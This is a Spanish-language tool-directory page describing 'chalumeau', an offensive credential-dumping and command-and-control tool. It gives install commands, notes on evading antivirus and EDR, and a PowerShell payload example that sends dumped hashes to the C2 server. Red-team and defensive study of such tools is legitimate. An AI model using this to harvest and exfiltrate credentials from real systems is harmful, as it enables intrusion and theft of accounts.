Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/cyberstruggle/chalumeau
Ataques de ContraseñasPost-ExplotaciónPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau es una herramienta automatizada, extensible y personalizable de volcado de credenciales basada en powershell y python.

Ver Repositorio
102195hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir


Chalumeau

Chalumeau es una herramienta automatizada, extensible y personalizable para el volcado de credenciales basada en PowerShell y Python.

Principales Características

  • Escribe tus propios Payloads
  • Ejecución en memoria
  • Extraer lista de contraseñas
  • Panel de control / Interfaz web
  • Análisis de Mimikatz
  • Volcado de Tickets

Capturas de pantalla


Problemas conocidos

  • Análisis de Mimikatz dcsync (trabajando en una solución)
  • Bypass de Antivirus y EDRs, necesitarás mantener tus payloads

Por hacer

  • Comunicación cifrada
  • Movimiento lateral automatizado
  • Ataque de contraseñas por pulverización automatizado
  • Cracking de hashes automatizado

Uso

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# Run
chmod +x start.sh

sudo ./start.sh

Escribe tu propio payload

Ofusca tu propio payload de PowerShell para volcar credenciales y usa la llamada a la función de Chalumeau sin ninguna importación. Chalumeau cifrará y contactará con el C2 y enviará las credenciales volcadas. simplemente guarda el archivo en chalumeau-power/payloads

  • Usando la función ChalumeauSendCredentials
    • ChalumeauSendCredentials
      • Secret = el hash volcado o la contraseña en texto claro (cadena)
      • Username = el nombre de usuario o ID de la credencial volcada (cadena)
      • IsClearText = 1 si es texto claro, 0 si no lo es (int)
      • Source = menciona el payload de origen como "Mimikatz Hash" (cadena)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

Créditos

  • wazehell Autor
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Chalumeau Logo Aureliano
  • Invoke-MassMimikatz PowerTools
Descargar herramienta